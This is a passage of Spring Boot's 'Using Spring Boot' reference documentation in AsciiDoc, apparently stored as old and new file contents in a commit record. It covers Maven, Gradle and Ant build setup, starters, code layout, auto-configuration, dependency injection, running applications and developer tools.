environment.\nSee the <<configuring-file-system-watcher>> section for configuring these properties.\n\nNOTE: Files are only monitored when the remote client is running.\nIf you change a file before starting the remote client, it is not pushed to the remote server.\n\n\n\n[[using-boot-packaging-for-production]]\n== Packaging Your Application for Production\nExecutable jars can be used for production deployment.\nAs they are self-contained, they are also ideally suited for cloud-based deployment.\n\nFor additional \"`production ready`\" features, such as health, auditing, and metric REST or JMX end-points, consider adding `spring-boot-actuator`.\nSee _<<production-ready-features.adoc#production-ready>>_ for details.\n\n\n\n[[using-boot-whats-next]]\n== What to Read Next\nYou should now understand how you can use Spring Boot and some best practices that you should follow.\nYou can now go on to learn about specific _<<spring-boot-features#boot-features, Spring Boot features>>_ in depth, or you could skip ahead and read about the \"`<<production-ready-features#production-ready, production ready>>`\" aspects of Spring Boot.\n","old_contents":"[[using-boot]]\n= Using Spring Boot\ninclude::attributes.adoc[]\n\nThis section goes into more detail about how you should use Spring Boot.\nIt covers topics such as build systems, 
auto-configuration, and how to run your applications.\nWe also cover some Spring Boot best practices.\nAlthough there is nothing particularly special about Spring Boot (it is just another library that you can consume), there are a few recommendations that, when followed, make your development process a little easier.\n\nIf you are starting out with Spring Boot, you should probably read the _<<getting-started.adoc#getting-started, Getting Started>>_ guide before diving into this section.\n\n\n\n[[using-boot-build-systems]]\n== Build Systems\nIt is strongly recommended that you choose a build system that supports <<using-boot-dependency-management,_dependency management_>> and that can consume artifacts published to the \"`Maven Central`\" repository.\nWe would recommend that you choose Maven or Gradle.\nIt is possible to get Spring Boot to work with other build systems (Ant, for example), but they are not particularly well supported.\n\n\n\n[[using-boot-dependency-management]]\n=== Dependency Management\nEach release of Spring Boot provides a curated list of dependencies that it supports.\nIn practice, you do not need to provide a version for any of these dependencies in your build configuration, as Spring Boot manages that for you.\nWhen you upgrade Spring Boot itself, these dependencies are upgraded as well in a consistent way.\n\nNOTE: You can still specify a version and override Spring Boot's recommendations if you need to do so.\n\nThe curated list contains all the Spring modules that you can use with Spring Boot as well as a refined list of third-party libraries.\nThe list is available as a standard <<using-boot-maven-without-a-parent,Bill of Materials (`spring-boot-dependencies`)>> that can be used with both <<using-boot-maven-parent-pom,Maven>> and <<using-boot-gradle,Gradle>>.\n\nWARNING: Each release of Spring Boot is associated with a base version of the Spring Framework.\nWe **highly** recommend that you not specify its version.\n\n\n\n[[using-boot-maven]]\n=== Maven\nMaven users can inherit from the `spring-boot-starter-parent` project to obtain sensible defaults.\nThe parent project provides the following features:\n\n* Java 1.8 as the default compiler level.\n* UTF-8 source encoding.\n* A <<using-boot-dependency-management,Dependency Management section>>, inherited from the spring-boot-dependencies pom, that manages the versions of common dependencies.\nThis dependency management lets you omit <version> tags for those dependencies when used in your own pom.\n* An execution of the {spring-boot-maven-plugin-docs}\/repackage-mojo.html[`repackage` goal] with a `repackage` execution id.\n* Sensible https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/examples\/filter.html[resource filtering].\n* Sensible plugin configuration (https:\/\/www.mojohaus.org\/exec-maven-plugin\/[exec plugin], https:\/\/github.com\/ktoso\/maven-git-commit-id-plugin[Git commit ID], and https:\/\/maven.apache.org\/plugins\/maven-shade-plugin\/[shade]).\n* Sensible resource filtering for `application.properties` and `application.yml` including profile-specific files (for example, `application-dev.properties` and `application-dev.yml`).\n\nNote that, since the `application.properties` and `application.yml` files accept Spring style placeholders (`${...}`), the Maven filtering is changed to use `@..@` placeholders.\n(You can override that by setting a Maven property called `resource.delimiter`.)\n\n\n\n[[using-boot-maven-parent-pom]]\n==== Inheriting the Starter Parent\nTo configure your project to 
inherit from the `spring-boot-starter-parent`, set the `parent` as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<!-- Inherit defaults from Spring Boot -->\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>{spring-boot-version}<\/version>\n\t<\/parent>\n----\n\nNOTE: You should need to specify only the Spring Boot version number on this dependency.\nIf you import additional starters, you can safely omit the version number.\n\nWith that setup, you can also override individual dependencies by overriding a property in your own project.\nFor instance, to upgrade to another Spring Data release train, you would add the following to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<spring-data-releasetrain.version>Fowler-SR2<\/spring-data-releasetrain.version>\n\t<\/properties>\n----\n\nTIP: Check the {spring-boot-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies` pom] for a list of supported properties.\n\n\n\n[[using-boot-maven-without-a-parent]]\n==== Using Spring Boot without the Parent POM\nNot everyone likes inheriting from the `spring-boot-starter-parent` POM.\nYou may have your own corporate standard parent that you need to use or you may prefer to explicitly declare all your Maven configuration.\n\nIf you do not want to use the `spring-boot-starter-parent`, you can still keep the benefit of the dependency management (but not the plugin management) by using a `scope=import` dependency, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<!-- Import dependency management from Spring Boot -->\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nThe preceding sample setup does not let you override individual dependencies by using a property, as explained above.\nTo achieve the same result, you need to add an entry in the `dependencyManagement` of your project **before** the `spring-boot-dependencies` entry.\nFor instance, to upgrade to another Spring Data release train, you could add the following element to your `pom.xml`:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencyManagement>\n\t\t<dependencies>\n\t\t\t<!-- Override Spring Data release train provided by Spring Boot -->\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.data<\/groupId>\n\t\t\t\t<artifactId>spring-data-releasetrain<\/artifactId>\n\t\t\t\t<version>Moore-SR10<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-dependencies<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<type>pom<\/type>\n\t\t\t\t<scope>import<\/scope>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/dependencyManagement>\n----\n\nNOTE: In the preceding example, we specify a _BOM_, but any dependency type can be overridden in the same way.\n\n\n\n[[using-boot-maven-plugin]]\n==== Using the Spring Boot Maven Plugin\nSpring Boot includes a 
<<build-tool-plugins.adoc#build-tool-plugins-maven-plugin, Maven plugin>> that can package the project as an executable jar.\nAdd the plugin to your `<plugins>` section if you want to use it, as shown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nNOTE: If you use the Spring Boot starter parent pom, you need to add only the plugin.\nThere is no need to configure it unless you want to change the settings defined in the parent.\n\n\n\n[[using-boot-gradle]]\n=== Gradle\nTo learn about using Spring Boot with Gradle, please refer to the documentation for Spring Boot's Gradle plugin:\n\n* Reference ({spring-boot-gradle-plugin-docs}[HTML] and {spring-boot-gradle-plugin-pdfdocs}[PDF])\n* {spring-boot-gradle-plugin-api}[API]\n\n\n\n[[using-boot-ant]]\n=== Ant\nIt is possible to build a Spring Boot project using Apache Ant+Ivy.\nThe `spring-boot-antlib` \"`AntLib`\" module is also available to help Ant create executable jars.\n\nTo declare dependencies, a typical `ivy.xml` file looks something like the following example:\n\n[source,xml,indent=0]\n----\n\t<ivy-module version=\"2.0\">\n\t\t<info organisation=\"org.springframework.boot\" module=\"spring-boot-sample-ant\" \/>\n\t\t<configurations>\n\t\t\t<conf name=\"compile\" description=\"everything needed to compile this module\" \/>\n\t\t\t<conf name=\"runtime\" extends=\"compile\" description=\"everything needed to run this module\" \/>\n\t\t<\/configurations>\n\t\t<dependencies>\n\t\t\t<dependency org=\"org.springframework.boot\" name=\"spring-boot-starter\"\n\t\t\t\trev=\"${spring-boot.version}\" conf=\"compile\" \/>\n\t\t<\/dependencies>\n\t<\/ivy-module>\n----\n\nA typical `build.xml` looks like the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<project\n\t\txmlns:ivy=\"antlib:org.apache.ivy.ant\"\n\t\txmlns:spring-boot=\"antlib:org.springframework.boot.ant\"\n\t\tname=\"myapp\" default=\"build\">\n\n\t\t<property name=\"spring-boot.version\" value=\"{spring-boot-version}\" \/>\n\n\t\t<target name=\"resolve\" description=\"--> retrieve dependencies with ivy\">\n\t\t\t<ivy:retrieve pattern=\"lib\/[conf]\/[artifact]-[type]-[revision].[ext]\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"classpaths\" depends=\"resolve\">\n\t\t\t<path id=\"compile.classpath\">\n\t\t\t\t<fileset dir=\"lib\/compile\" includes=\"*.jar\" \/>\n\t\t\t<\/path>\n\t\t<\/target>\n\n\t\t<target name=\"init\" depends=\"classpaths\">\n\t\t\t<mkdir dir=\"build\/classes\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"compile\" depends=\"init\" description=\"compile\">\n\t\t\t<javac srcdir=\"src\/main\/java\" destdir=\"build\/classes\" classpathref=\"compile.classpath\" \/>\n\t\t<\/target>\n\n\t\t<target name=\"build\" depends=\"compile\">\n\t\t\t<spring-boot:exejar destfile=\"build\/myapp.jar\" classes=\"build\/classes\">\n\t\t\t\t<spring-boot:lib>\n\t\t\t\t\t<fileset dir=\"lib\/runtime\" \/>\n\t\t\t\t<\/spring-boot:lib>\n\t\t\t<\/spring-boot:exejar>\n\t\t<\/target>\n\t<\/project>\n----\n\nTIP: If you do not want to use the `spring-boot-antlib` module, see the _<<howto.adoc#howto-build-an-executable-archive-with-ant>>_ \"`How-to`\" .\n\n\n\n[[using-boot-starter]]\n=== Starters\nStarters are a set of convenient dependency descriptors that you can include in your application.\nYou get a 
one-stop shop for all the Spring and related technologies that you need without having to hunt through sample code and copy-paste loads of dependency descriptors.\nFor example, if you want to get started using Spring and JPA for database access, include the `spring-boot-starter-data-jpa` dependency in your project.\n\nThe starters contain a lot of the dependencies that you need to get a project up and running quickly and with a consistent, supported set of managed transitive dependencies.\n\n.What's in a name\n****\nAll **official** starters follow a similar naming pattern: `+spring-boot-starter-*+`, where `+*+` is a particular type of application.\nThis naming structure is intended to help when you need to find a starter.\nThe Maven integration in many IDEs lets you search dependencies by name.\nFor example, with the appropriate Eclipse or STS plugin installed, you can press `ctrl-space` in the POM editor and type \"`spring-boot-starter`\" for a complete list.\n\nAs explained in the \"`<<spring-boot-features#boot-features-custom-starter,Creating Your Own Starter>>`\" section, third-party starters should not start with `spring-boot`, as it is reserved for official Spring Boot artifacts.\nRather, a third-party starter typically starts with the name of the project.\nFor example, a third-party starter project called `thirdpartyproject` would typically be named `thirdpartyproject-spring-boot-starter`.\n****\n\nThe following application starters are provided by Spring Boot under the `org.springframework.boot` group:\n\n.Spring Boot application starters\ninclude::{generated-resources-root}\/application-starters.adoc[]\n\nIn addition to the application starters, the following starters can be used to add _<<production-ready-features.adoc#production-ready, production ready>>_ features:\n\n.Spring Boot production starters\ninclude::{generated-resources-root}\/production-starters.adoc[]\n\nFinally, Spring Boot also includes the following starters that can be used if you want to exclude or swap specific technical facets:\n\n.Spring Boot technical starters\ninclude::{generated-resources-root}\/technical-starters.adoc[]\n\nTo learn how to swap technical facets, please see the how-to documentation for <<howto.adoc#howto-use-another-web-server, swapping web server>> and <<howto.adoc#howto-configure-log4j-for-logging, logging system>>.\n\nTIP: For a list of additional community contributed starters, see the {spring-boot-master-code}\/spring-boot-project\/spring-boot-starters\/README.adoc[README file] in the `spring-boot-starters` module on GitHub.\n\n\n\n[[using-boot-structuring-your-code]]\n== Structuring Your Code\nSpring Boot does not require any specific code layout to work.\nHowever, there are some best practices that help.\n\n\n\n[[using-boot-using-the-default-package]]\n=== Using the \"`default`\" Package\nWhen a class does not include a `package` declaration, it is considered to be in the \"`default package`\".\nThe use of the \"`default package`\" is generally discouraged and should be avoided.\nIt can cause particular problems for Spring Boot applications that use the `@ComponentScan`, `@ConfigurationPropertiesScan`, `@EntityScan`, or `@SpringBootApplication` annotations, since every class from every jar is read.\n\nTIP: We recommend that you follow Java's recommended package naming conventions and use a reversed domain name (for example, `com.example.project`).
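\n\nIn practice, that simply means every class starts with a `package` declaration; a minimal sketch (the `com.example.project` package and class name are illustrative):\n\n[source,java,indent=0]\n----\n\t\/\/ A package declaration keeps this class out of the \"default package\"\n\tpackage com.example.project;\n\n\tpublic class MyComponent {\n\n\t}\n----\n\n\n\n[[using-boot-locating-the-main-class]]\n=== Locating the Main Application Class\nWe generally recommend that you locate your main 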
application class in a root package above other classes.\nThe <<using-boot-using-springbootapplication-annotation, `@SpringBootApplication` annotation>> is often placed on your main class, and it implicitly defines a base \"`search package`\" for certain items.\nFor example, if you are writing a JPA application, the package of the `@SpringBootApplication` annotated class is used to search for `@Entity` items.\nUsing a root package also allows component scan to apply only to your project.\n\nTIP: If you don't want to use `@SpringBootApplication`, the `@EnableAutoConfiguration` and `@ComponentScan` annotations that it imports define that behaviour, so you can use those instead.\n\nThe following listing shows a typical layout:\n\n[indent=0]\n----\n\tcom\n\t +- example\n\t +- myapplication\n\t +- Application.java\n\t |\n\t +- customer\n\t | +- Customer.java\n\t | +- CustomerController.java\n\t | +- CustomerService.java\n\t | +- CustomerRepository.java\n\t |\n\t +- order\n\t +- Order.java\n\t +- OrderController.java\n\t +- OrderService.java\n\t +- OrderRepository.java\n----\n\nThe `Application.java` file would declare the `main` method, along with the basic `@SpringBootApplication`, as follows:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\n\n\n[[using-boot-configuration-classes]]\n== Configuration Classes\nSpring Boot favors Java-based configuration.\nAlthough it is possible to use `SpringApplication` with XML sources, we generally recommend that your primary source be a single `@Configuration` class.\nUsually the class that defines the `main` method is a good candidate as the primary `@Configuration`.\n\nTIP: Many Spring configuration examples have been published on the Internet that use XML configuration.\nIf possible, always try to use the equivalent Java-based configuration.\nSearching for `+Enable*+` annotations can be a good starting point.\n\n\n\n[[using-boot-importing-configuration]]\n=== Importing Additional Configuration Classes\nYou need not put all your `@Configuration` into a single class.\nThe `@Import` annotation can be used to import additional configuration classes.\nAlternatively, you can use `@ComponentScan` to automatically pick up all Spring components, including `@Configuration` classes.\n\n\n\n[[using-boot-importing-xml-configuration]]\n=== Importing XML Configuration\nIf you absolutely must use XML-based configuration, we recommend that you still start with a `@Configuration` class.\nYou can then use an `@ImportResource` annotation to load XML configuration files.
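\nFor example, a minimal sketch (the `legacy-context.xml` resource name is illustrative):\n\n[source,java,indent=0]\n----\n\timport org.springframework.context.annotation.Configuration;\n\timport org.springframework.context.annotation.ImportResource;\n\n\t\/\/ Loads additional bean definitions from an XML file on the classpath\n\t@Configuration(proxyBeanMethods = false)\n\t@ImportResource(\"classpath:legacy-context.xml\")\n\tpublic class LegacyXmlConfig {\n\n\t}\n----\n\n\n\n[[using-boot-auto-configuration]]\n== Auto-configuration\nSpring Boot auto-configuration attempts to automatically configure your Spring application based on the jar dependencies that you have added.\nFor example, if `HSQLDB` is on your classpath, and you have not manually configured any database connection beans, then Spring Boot auto-configures an in-memory database.\n\nYou need to opt in to auto-configuration by adding the `@EnableAutoConfiguration` or `@SpringBootApplication` annotations to one of your `@Configuration` classes.\n\nTIP: You should only ever add one `@SpringBootApplication` or `@EnableAutoConfiguration` annotation.\nWe generally recommend that you add 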
one or the other to your primary `@Configuration` class only.\n\n\n\n[[using-boot-replacing-auto-configuration]]\n=== Gradually Replacing Auto-configuration\nAuto-configuration is non-invasive.\nAt any point, you can start to define your own configuration to replace specific parts of the auto-configuration.\nFor example, if you add your own `DataSource` bean, the default embedded database support backs away.
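\nThe following is a minimal sketch of such a user-defined `DataSource` bean (the connection details are illustrative and assume a suitable JDBC driver is on the classpath):\n\n[source,java,indent=0]\n----\n\timport javax.sql.DataSource;\n\n\timport org.springframework.boot.jdbc.DataSourceBuilder;\n\timport org.springframework.context.annotation.Bean;\n\timport org.springframework.context.annotation.Configuration;\n\n\t@Configuration(proxyBeanMethods = false)\n\tpublic class DataSourceConfig {\n\n\t\t\/\/ Once this bean is present, the embedded database is no longer auto-configured\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn DataSourceBuilder.create()\n\t\t\t\t\t.url(\"jdbc:postgresql:\/\/localhost:5432\/mydb\")\n\t\t\t\t\t.username(\"myuser\")\n\t\t\t\t\t.password(\"secret\")\n\t\t\t\t\t.build();\n\t\t}\n\n\t}\n----\n\nIf you need to find out what auto-configuration is currently being applied, and why, start your application with the `--debug` switch.\nDoing so enables debug logs for a selection of core loggers and logs a conditions report to the console.\n\n\n\n[[using-boot-disabling-specific-auto-configuration]]\n=== Disabling Specific Auto-configuration Classes\nIf you find that specific auto-configuration classes that you do not want are being applied, you can use the `exclude` attribute of `@SpringBootApplication` to disable them, as shown in the following example:\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.*;\n\timport org.springframework.boot.autoconfigure.jdbc.*;\n\n\t@SpringBootApplication(exclude={DataSourceAutoConfiguration.class})\n\tpublic class MyApplication {\n\t}\n----\n\nIf the class is not on the classpath, you can use the `excludeName` attribute of the annotation and specify the fully qualified name instead.\nIf you prefer to use `@EnableAutoConfiguration` rather than `@SpringBootApplication`, `exclude` and `excludeName` are also available.\nFinally, you can also control the list of auto-configuration classes to exclude by using the configprop:spring.autoconfigure.exclude[] property.\n\nTIP: You can define exclusions both at the annotation level and by using the property.\n\nNOTE: Even though auto-configuration classes are `public`, the only aspect of the class that is considered public API is the name of the class, which can be used for disabling the auto-configuration.\nThe actual contents of those classes, such as nested configuration classes or bean methods, are for internal use only, and we do not recommend using those directly.\n\n\n\n[[using-boot-spring-beans-and-dependency-injection]]\n== Spring Beans and Dependency Injection\nYou are free to use any of the standard Spring Framework techniques to define your beans and their injected dependencies.\nWe often find that using `@ComponentScan` (to find your beans) and using `@Autowired` (to do constructor injection) works well.\n\nIf you structure your code as suggested above (locating your application class in a root package), you can add `@ComponentScan` without any arguments.\nAll of your application components (`@Component`, `@Service`, `@Repository`, `@Controller`, etc.) 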
are automatically registered as Spring Beans.\n\nThe following example shows a `@Service` Bean that uses constructor injection to obtain a required `RiskAssessor` bean:\n\n[source,java,indent=0]\n----\n\tpackage com.example.service;\n\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.stereotype.Service;\n\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\t@Autowired\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf a bean has one constructor, you can omit the `@Autowired`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\t@Service\n\tpublic class DatabaseAccountService implements AccountService {\n\n\t\tprivate final RiskAssessor riskAssessor;\n\n\t\tpublic DatabaseAccountService(RiskAssessor riskAssessor) {\n\t\t\tthis.riskAssessor = riskAssessor;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: Notice how using constructor injection lets the `riskAssessor` field be marked as `final`, indicating that it cannot be subsequently changed.\n\n\n\n[[using-boot-using-springbootapplication-annotation]]\n== Using the @SpringBootApplication Annotation\nMany Spring Boot developers like their apps to use auto-configuration, component scan, and be able to define extra configuration on their \"application class\".\nA single `@SpringBootApplication` annotation can be used to enable those three features, that is:\n\n* `@EnableAutoConfiguration`: enable <<using-boot-auto-configuration,Spring Boot's auto-configuration mechanism>>\n* `@ComponentScan`: enable `@Component` scan on the package where the application is located (see <<using-boot-structuring-your-code,the best practices>>)\n* `@Configuration`: allow registering extra beans in the context or importing additional configuration classes\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication \/\/ same as @Configuration @EnableAutoConfiguration @ComponentScan\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nNOTE: `@SpringBootApplication` also provides aliases to customize the attributes of `@EnableAutoConfiguration` and `@ComponentScan`.
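\n\nFor example, a minimal sketch using those aliases (the scanned package and the excluded class are illustrative):\n\n[source,java,indent=0]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration;\n\n\t\/\/ scanBasePackages is an alias for @ComponentScan, exclude for @EnableAutoConfiguration\n\t@SpringBootApplication(scanBasePackages = \"com.example.myapplication\", exclude = DataSourceAutoConfiguration.class)\n\tpublic class Application {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\nNone of these features are mandatory and you may choose to replace this single annotation by any of the features that it enables.\nFor instance, you may not want to use component scan or configuration properties scan in your application:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapplication;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.EnableAutoConfiguration;\n\timport org.springframework.context.annotation.Configuration;\n\timport org.springframework.context.annotation.Import;\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableAutoConfiguration\n\t@Import({ MyConfig.class, MyAnotherConfig.class })\n\tpublic class Application {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nIn this example, `Application` is just like any other Spring Boot application except that `@Component`-annotated classes and `@ConfigurationProperties`-annotated classes are not 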
detected automatically and the user-defined beans are imported explicitly (see `@Import`).\n====\n\n\n\n[[using-boot-running-your-application]]\n== Running Your Application\nOne of the biggest advantages of packaging your application as a jar and using an embedded HTTP server is that you can run your application as you would any other.\nThe same applies to debugging Spring Boot applications.\nYou do not need any special IDE plugins or extensions.\n\nNOTE: This section only covers jar-based packaging.\nIf you choose to package your application as a war file, you should refer to your server and IDE documentation.\n\n\n\n[[using-boot-running-from-an-ide]]\n=== Running from an IDE\nYou can run a Spring Boot application from your IDE as a Java application.\nHowever, you first need to import your project.\nImport steps vary depending on your IDE and build system.\nMost IDEs can import Maven projects directly.\nFor example, Eclipse users can select `Import...` -> `Existing Maven Projects` from the `File` menu.\n\nIf you cannot directly import your project into your IDE, you may be able to generate IDE metadata by using a build plugin.\nMaven includes plugins for https:\/\/maven.apache.org\/plugins\/maven-eclipse-plugin\/[Eclipse] and https:\/\/maven.apache.org\/plugins\/maven-idea-plugin\/[IDEA].\nGradle offers plugins for {gradle-docs}\/userguide.html[various IDEs].\n\nTIP: If you accidentally run a web application twice, you see a \"`Port already in use`\" error.\nSTS users can use the `Relaunch` button rather than the `Run` button to ensure that any existing instance is closed.\n\n\n\n[[using-boot-running-as-a-packaged-application]]\n=== Running as a Packaged Application\nIf you use the Spring Boot Maven or Gradle plugins to create an executable jar, you can run your application using `java -jar`, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\nIt is also possible to run a packaged application with remote debugging support enabled.\nDoing so lets you attach a debugger to your packaged application, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -Xdebug -Xrunjdwp:server=y,transport=dt_socket,address=8000,suspend=n \\\n\t -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----
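\n\nThe `-Xdebug` and `-Xrunjdwp` options shown above are the legacy form; on Java 5 and later, the equivalent `-agentlib:jdwp` syntax is generally preferred (a sketch, with the same illustrative port):\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8000 \\\n\t -jar target\/myapplication-0.0.1-SNAPSHOT.jar\n----\n\n\n\n[[using-boot-running-with-the-maven-plugin]]\n=== Using the Maven Plugin\nThe Spring Boot Maven plugin includes a `run` goal that can be used to quickly compile and run your application.\nApplications run in an exploded form, as they do in your IDE.\nThe following example shows a typical Maven command to run a Spring Boot application:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ mvn spring-boot:run\n----\n\nYou might also want to use the `MAVEN_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export MAVEN_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-running-with-the-gradle-plugin]]\n=== Using the Gradle Plugin\nThe Spring Boot Gradle plugin also includes a `bootRun` task that can be used to run your application in an exploded form.\nThe `bootRun` task is added whenever you apply the `org.springframework.boot` and `java` plugins and is shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ gradle bootRun\n----\n\nYou might also want to use the `JAVA_OPTS` operating system environment variable, as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ export 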
JAVA_OPTS=-Xmx1024m\n----\n\n\n\n[[using-boot-hot-swapping]]\n=== Hot Swapping\nSince Spring Boot applications are plain Java applications, JVM hot-swapping should work out of the box.\nJVM hot swapping is somewhat limited with the bytecode that it can replace.\nFor a more complete solution, https:\/\/www.jrebel.com\/products\/jrebel[JRebel] can be used.\n\nThe `spring-boot-devtools` module also includes support for quick application restarts.\nSee the <<using-boot-devtools>> section later in this chapter and the <<howto.adoc#howto-hotswapping, Hot swapping \"`How-to`\">> for details.\n\n\n\n[[using-boot-devtools]]\n== Developer Tools\nSpring Boot includes an additional set of tools that can make the application development experience a little more pleasant.\nThe `spring-boot-devtools` module can be included in any project to provide additional development-time features.\nTo include devtools support, add the module dependency to your build, as shown in the following listings for Maven and Gradle:\n\n.Maven\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-devtools<\/artifactId>\n\t\t\t<optional>true<\/optional>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n.Gradle\n[source,groovy,indent=0,subs=\"attributes\"]\n----\n\tconfigurations {\n\t\tdevelopmentOnly\n\t\truntimeClasspath {\n\t\t\textendsFrom developmentOnly\n\t\t}\n\t}\n\tdependencies {\n\t\tdevelopmentOnly(\"org.springframework.boot:spring-boot-devtools\")\n\t}\n----\n\nNOTE: Developer tools are automatically disabled when running a fully packaged application.\nIf your application is launched from `java -jar` or if it is started from a special classloader, then it is considered a \"`production application`\".\nIf that does not apply to you (i.e. 
if you run your application from a container), consider excluding devtools or set the `-Dspring.devtools.restart.enabled=false` system property.\n\nTIP: Flagging the dependency as optional in Maven or using a custom `developmentOnly` configuration in Gradle (as shown above) is a best practice that prevents devtools from being transitively applied to other modules that use your project.\n\nTIP: Repackaged archives do not contain devtools by default.\nIf you want to use a <<using-boot-devtools-remote,certain remote devtools feature>>, you need to disable the `excludeDevtools` build property to include it.\nThe property is supported with both the Maven and Gradle plugins.\n\n\n\n[[using-boot-devtools-property-defaults]]\n=== Property Defaults\nSeveral of the libraries supported by Spring Boot use caches to improve performance.\nFor example, <<spring-boot-features#boot-features-spring-mvc-template-engines,template engines>> cache compiled templates to avoid repeatedly parsing template files.\nAlso, Spring MVC can add HTTP caching headers to responses when serving static resources.\n\nWhile caching is very beneficial in production, it can be counter-productive during development, preventing you from seeing the changes you just made in your application.\nFor this reason, spring-boot-devtools disables the caching options by default.\n\nCache options are usually configured by settings in your `application.properties` file.\nFor example, Thymeleaf offers the configprop:spring.thymeleaf.cache[] property.\nRather than needing to set these properties manually, the `spring-boot-devtools` module automatically applies sensible development-time configuration.\n\nBecause you need more information about web requests while developing Spring MVC and Spring WebFlux applications, developer tools will enable `DEBUG` logging for the `web` logging group.\nThis will give you information about the incoming request, which handler is processing it, the response outcome, etc.\nIf you wish to log all request details (including potentially sensitive information), you can turn on the configprop:spring.http.log-request-details[] configuration property.\n\nNOTE: If you don't want property defaults to be applied you can set configprop:spring.devtools.add-properties[] to `false` in your `application.properties`.\n\nTIP: For a complete list of the properties that are applied by the devtools, see {spring-boot-devtools-module-code}\/env\/DevToolsPropertyDefaultsPostProcessor.java[DevToolsPropertyDefaultsPostProcessor].\n\n\n\n[[using-boot-devtools-restart]]\n=== Automatic Restart\nApplications that use `spring-boot-devtools` automatically restart whenever files on the classpath change.\nThis can be a useful feature when working in an IDE, as it gives a very fast feedback loop for code changes.\nBy default, any entry on the classpath that points to a folder is monitored for changes.\nNote that certain resources, such as static assets and view templates, <<using-boot-devtools-restart-exclude, do not need to restart the application>>.\n\n.Triggering a restart\n****\nAs DevTools monitors classpath resources, the only way to trigger a restart is to update the classpath.\nThe way in which you cause the classpath to be updated depends on the IDE that you are using:\n\n* In Eclipse, saving a modified file causes the classpath to be updated and triggers a restart.\n* In IntelliJ IDEA, building the project (`Build +->+ Build Project`) has the same effect.\n* If using a build plugin, running `mvn compile` for Maven or `gradle build` for 
